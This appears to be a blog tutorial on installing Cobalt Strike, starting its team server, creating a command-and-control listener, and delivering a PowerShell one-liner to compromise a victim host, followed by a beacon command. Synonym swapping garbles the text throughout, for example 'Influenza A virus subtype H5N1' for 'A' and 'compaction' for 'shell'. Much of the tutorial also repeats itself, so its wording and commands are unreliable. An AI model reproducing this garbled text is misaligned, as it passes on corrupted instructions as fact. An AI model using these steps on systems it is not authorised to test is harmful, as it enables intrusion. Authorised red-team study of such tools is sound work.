As an aspiring Red Teamer, I’ve lately started playing amongst Cobalt Strike, together with then I thought it would live on a proficient thought to start a serial of weblog posts on using it together with its many features. As unopen to of you lot may live on aware, Cobalt Strike is software for Adversary Simulations together with Red Team Operations.
More data tin live on establish here: https://www.cobaltstrike.com
In this commencement post, I volition speedily acquire through how to acquire Cobalt Strike upwards together with running on your system, creating a listener together with interacting amongst a victim’s machine. This volition live on curt together with to the point.
If you lot haven’t used Cobalt Strike before, Im going to presume that you lot havent acquire a total licenced copy. Influenza A virus subtype H5N1 trial re-create tin live on requested at the next URL:
https://trial.cobaltstrike.com/
Installation together with setup tin live on establish here:
https://www.cobaltstrike.com/support
Once you lot convey your trial re-create downloaded together with pre-requisites installed you lot tin begin.
From inside the Cobalt Strike directory, type the next dominance to start the squad server. 192.168.0.12 is the IP address of my Kali Linux system. Note: The password tin live on anything you lot desire.
Type the next dominance to start the Cobalt Strike user interface
Once you lot convey started Cobalt Strike, you lot are required to connect to your squad server. Fill inwards the details including the password you lot railroad train when starting the squad server. The User champaign tin live on anything you lot want. Use your super cool hacker grip here. ;P
Once connected, you lot volition live on presented amongst the Cobalt Strike user interface where you lot volition interact amongst your agents together with practise all sorts of other cool stuff.
You volition live on required to practise a listener for your compromised machines to connect to. Simply click Cobalt Strike – Listeners.
Once the Listeners tab has loaded, click Add.
Give the listener a name, inwards this case, I called it “C2”. Select your desired payload, ensure the IP address is right (team server IP) together with pick out a port to head on.
Here you lot tin input a domain advert that points to your squad server. We volition utilisation an IP address inwards this case.
The listener has been created together with tin live on viewed, deleted etc from the Listeners tab.
We are instantly going to speedily compromise a host together with convey it connect to our squad server inwards lodge to interact amongst it.
Select Attacks – Web Drive-by – Scripted Web Delivery
This volition furnish us amongst a PowerShell one-liner to run on the victim host.
Here nosotros select the options to configure our quick spider web server to host together with deliver the PowerShell one-liner.
Copy the URL provided.
Switch over to the victim’s automobile together with glue inwards the PowerShell one-liner. Just to live on clear, this is for demonstration purposes. In reality, the payload would live on delivered to the victim via unopen to form of social applied scientific discipline attack.
Once the PowerShell one-liner is executed, the victim volition connect to the squad server together with live on available for interaction.
To interact amongst the host, right click on the compromised host together with click Interact.
For demonstration, I typed the next command:
If you’re itching to acquire more, I’d recommend reading through the Cobalt Strike manual: https://www.cobaltstrike.com/downloads/csmanual39.pdf
More data tin live on establish here: https://www.cobaltstrike.com
In this commencement post, I volition speedily acquire through how to acquire Cobalt Strike upwards together with running on your system, creating a listener together with interacting amongst a victim’s machine. This volition live on curt together with to the point.
If you lot haven’t used Cobalt Strike before, Im going to presume that you lot havent acquire a total licenced copy. Influenza A virus subtype H5N1 trial re-create tin live on requested at the next URL:
https://trial.cobaltstrike.com/
Installation together with setup tin live on establish here:
https://www.cobaltstrike.com/support
Once you lot convey your trial re-create downloaded together with pre-requisites installed you lot tin begin.
Starting the squad server
From inside the Cobalt Strike directory, type the next dominance to start the squad server. 192.168.0.12 is the IP address of my Kali Linux system. Note: The password tin live on anything you lot desire.
./teamserver <IP Address> <password>
Starting Cobalt Strike
Type the next dominance to start the Cobalt Strike user interface
./cobaltstrike
Connecting to the squad server
Once you lot convey started Cobalt Strike, you lot are required to connect to your squad server. Fill inwards the details including the password you lot railroad train when starting the squad server. The User champaign tin live on anything you lot want. Use your super cool hacker grip here. ;P
Cobalt Strike’s user interface
Once connected, you lot volition live on presented amongst the Cobalt Strike user interface where you lot volition interact amongst your agents together with practise all sorts of other cool stuff.
Creating a listener
You volition live on required to practise a listener for your compromised machines to connect to. Simply click Cobalt Strike – Listeners.
Once the Listeners tab has loaded, click Add.
Give the listener a name, inwards this case, I called it “C2”. Select your desired payload, ensure the IP address is right (team server IP) together with pick out a port to head on.
Here you lot tin input a domain advert that points to your squad server. We volition utilisation an IP address inwards this case.
The listener has been created together with tin live on viewed, deleted etc from the Listeners tab.
Delivering the payload
We are instantly going to speedily compromise a host together with convey it connect to our squad server inwards lodge to interact amongst it.
Select Attacks – Web Drive-by – Scripted Web Delivery
This volition furnish us amongst a PowerShell one-liner to run on the victim host.
Here nosotros select the options to configure our quick spider web server to host together with deliver the PowerShell one-liner.
Copy the URL provided.
Switch over to the victim’s automobile together with glue inwards the PowerShell one-liner. Just to live on clear, this is for demonstration purposes. In reality, the payload would live on delivered to the victim via unopen to form of social applied scientific discipline attack.
Interacting amongst the victim host
Once the PowerShell one-liner is executed, the victim volition connect to the squad server together with live on available for interaction.
To interact amongst the host, right click on the compromised host together with click Interact.
For demonstration, I typed the next command:
beacon> compaction ipconfig /allHopefully this gave you lot unopen to insight on how slowly it is to acquire started amongst Cobalt Strike. There volition live on many to a greater extent than weblog posts surrounding this first-class product.
If you’re itching to acquire more, I’d recommend reading through the Cobalt Strike manual: https://www.cobaltstrike.com/downloads/csmanual39.pdf
